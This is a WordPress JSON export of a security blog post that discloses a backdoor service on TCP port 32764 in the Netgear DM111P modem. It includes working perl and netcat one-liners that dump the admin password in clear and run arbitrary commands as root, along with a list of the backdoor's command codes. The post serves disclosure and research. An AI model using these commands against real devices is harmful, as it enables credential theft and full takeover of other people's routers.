{"id":1425,"date":"2013-12-31T23:11:52","date_gmt":"2013-12-31T22:11:52","guid":{"rendered":"https:\/\/locallost.net\/?p=1425"},"modified":"2014-01-05T15:46:22","modified_gmt":"2014-01-05T14:46:22","slug":"netgear-dm111p-backdoor","status":"publish","type":"post","link":"https:\/\/locallost.net\/?p=1425","title":{"rendered":"Netgear DM111P backdoor?"},"content":{"rendered":"<p>After reading <a href=\"https:\/\/twitter.com\/elvanderb\">@elvanderb<\/a>&lsquo;s tweet about a <a href=\"https:\/\/twitter.com\/elvanderb\/status\/418053373632323584\">backdoor in his Linksys WAG200G<\/a>, I checked my Netgear DM111P DSL modem (running firmware <code>V2.00.27_WW<\/code>) and found that TCP\/32764 was opened and responding in a similar way.<\/p>\n<p>The admin&rsquo;s HTTP password is also exposed in clear through the <code>scfgmgr<\/code> process listening on TCP\/32764:<\/p>\n<pre><code>$ perl -e 'print pack(\"(III)&lt;\", 0x53634d4d, 0x01, 0x00)' \\\n| nc 192.168.0.1 32764 \\\n| perl -n0e 'chomp;print\"$_\\n\"' \\\n| grep ^http_\n<\/code><\/pre>\n<p>Output:<\/p>\n<pre><code>http_username=admin\nhttp_password=***password*in*clear***\nhttp_timeout=5\n<\/code><\/pre>\n<ul>\n<li><a href=\"https:\/\/github.com\/elvanderb\/TCP-32764\">https:\/\/github.com\/elvanderb\/TCP-32764<\/a><\/li>\n<\/ul>\n<p><!--more--><\/p>\n<p>More important, is the ability to execute arbitrary shell commands as root (with a code 7 message)!<\/p>\n<pre><code>$ perl -e '$c=\"ps\";print pack(\"(III)&lt;\", 0x53634d4d, 0x07, length($c)).$c' \\\n| nc 192.168.0.1 32764\nMMcS?  PID  Uid        VSZ Stat Command\n    1 root       1268 S   init       \n    2 root            SW  [keventd]\n    3 root            RWN [ksoftirqd_CPU0]\n    4 root            SW  [kswapd]\n    5 root            SW  [bdflush]\n    6 root            SW  [kupdated]\n    7 root            SW  [swapper]\n    8 root            SW  [mtdblockd]\n   55 root       1184 S   \/usr\/sbin\/dsl_cpe_control -f \/firmware\/modemhwe.bin -\n   56 root       1184 S   \/usr\/sbin\/dsl_cpe_control -f \/firmware\/modemhwe.bin -\n   57 root       1184 S   \/usr\/sbin\/dsl_cpe_control -f \/firmware\/modemhwe.bin -\n   65 root        628 S   \/sbin\/klogd \n  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b \n  130 root        620 S   \/usr\/sbin\/crond \n  131 root        652 S   \/sbin\/syslogd -f \/etc\/syslog.conf \n  133 root        868 S   \/usr\/sbin\/scfgmgr \n  135 root        600 S   \/usr\/sbin\/atm_monitor init \n  141 root       1184 S   \/usr\/sbin\/dsl_cpe_control -f \/firmware\/modemhwe.bin -\n  142 root        596 S   \/usr\/sbin\/cmd_agent_ap \n  143 root        596 S   \/usr\/sbin\/pb_ap \n  137 root            SW  [autbtex]\n  138 root            SW  [atm_led_complet]\n  139 root            SW  [pmex_ne]\n  140 root            SW  [pmex_fe]\n  163 root       1268 S   init       \n  165 root        672 S   \/usr\/sbin\/mini_httpd -d \/www -r NETGEAR DM111P  ADSL2\n  228 root        612 S   \/sbin\/br2684ctld \n  755 root        996 S   \/usr\/sbin\/scfgmgr \n  756 root       1268 S   sh -c ps \n  757 root       1272 R   ps\n<\/code><\/pre>\n<p>Further inspection:<\/p>\n<ul>\n<li>Download <a href=\"http:\/\/www.downloads.netgear.com\/files\/GDC\/DM111Pv2\/DM111Pv2%20Firmware%20Version%202.00.26%20(All%20regions%20except%20North%20America).zip\">http:\/\/www.downloads.netgear.com\/files\/GDC\/DM111Pv2\/DM111Pv2%20Firmware%20Version%202.00.26%20(All%20regions%20except%20North%20America).zip<\/a> (file is labeled with version <code>2.00.26<\/code> but contains version <code>2.00.27<\/code>).<\/li>\n<li>Unpack zip.<\/li>\n<li>Follow <a href=\"http:\/\/www.devttys0.com\/2011\/05\/reverse-engineering-firmware-linksys-wag120n\/\">devttys0.com<\/a> instructions for extracting the squashfs image.<\/li>\n<li>Disassemble <code>scfgmgr<\/code>.<\/li>\n<\/ul>\n<p>List of message&rsquo;s code for DM111P:<\/p>\n<ul>\n<li><code>1<\/code>: Get all nvram variables (<code>open<\/code>\/<code>lseek<\/code>\/<code>read<\/code> on <code>\/tmp\/nvram<\/code>)(contains PPPoE passwords, HTTP admin password, etc.)<\/li>\n<li><code>2<\/code>: Get a specific nvram variable (nvram_get)<\/li>\n<li><code>3<\/code>: Set a specific nvram variable (parse string with <code>strtok<\/code> and call nvram_set)<\/li>\n<li><code>4<\/code>: Commit nvram variables (nvram_commit)<\/li>\n<li><code>5<\/code>: Reset WAN mode ? (nvram_set <code>wan_mode=bridge<\/code>, <code>wan_encap=0<\/code>, <code>wan_vpi=8<\/code>, <code>wan_vci=81<\/code>, and finally <code>\/usr\/sbin\/rc wan restart&amp;<\/code>)<\/li>\n<li><code>6<\/code>: Get ADSL (up|down)stream speed <code>%dKbps\/%dKbps<\/code> (<code>fopen<\/code>\/<code>fscanf<\/code> on <code>\/tmp\/adsl\/downstream<\/code> and <code>\/tmp\/adsl\/upstream\/<\/code>)<\/li>\n<li><code>7<\/code>: Execute arbitrary commands through <code>popen<\/code>!!!<\/li>\n<li><code>8<\/code>: Write content to <code>\/tmp\/%s<\/code> file<\/li>\n<li><code>9<\/code>: Get version from <code>\/etc\/version<\/code><\/li>\n<li><code>10<\/code>: Get nvram value of variable <code>lan_ipaddr<\/code><\/li>\n<li><code>11<\/code>: Restore default nvram variables (nvram_set <code>restore_default=1<\/code>)<\/li>\n<li><code>12<\/code>: <code>fopen<\/code>\/<code>fseek<\/code>\/<code>fread<\/code> on <code>\/dev\/mtdblock\/5<\/code>?<\/li>\n<li><code>13<\/code>: nvram_load followed by nvram_commit?<\/li>\n<li><code>14<\/code>: Set firmware BOOT options? (execute <code>\/usr\/sbin\/fw_env %s %s<\/code> through a <code>system<\/code> call)<\/li>\n<li><code>20<\/code>: Get WAN interface MAC address? (nvram_get <code>wan_macaddr_def<\/code>)<\/li>\n<\/ul>\n<p>Update:<\/p>\n<ul>\n<li>Here is my try at <a href=\"\/?p=1450\">recompiling a firmware with a neutralized <code>scfgmgr<\/code><\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>After reading @elvanderb&lsquo;s tweet about a backdoor in his Linksys WAG200G, I checked my Netgear DM111P DSL modem (running firmware V2.00.27_WW) and found that TCP\/32764 was opened and responding in a similar way. The admin&rsquo;s HTTP password is also exposed &hellip; <a href=\"https:\/\/locallost.net\/?p=1425\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[4,18],"tags":[],"class_list":["post-1425","post","type-post","status-publish","format-standard","hentry","category-code","category-network"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p2Bei9-mZ","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/posts\/1425","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/locallost.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1425"}],"version-history":[{"count":25,"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/posts\/1425\/revisions"}],"predecessor-version":[{"id":1467,"href":"https:\/\/locallost.net\/index.php?rest_route=\/wp\/v2\/posts\/1425\/revisions\/1467"}],"wp:attachment":[{"href":"https:\/\/locallost.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1425"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/locallost.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1425"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/locallost.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1425"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}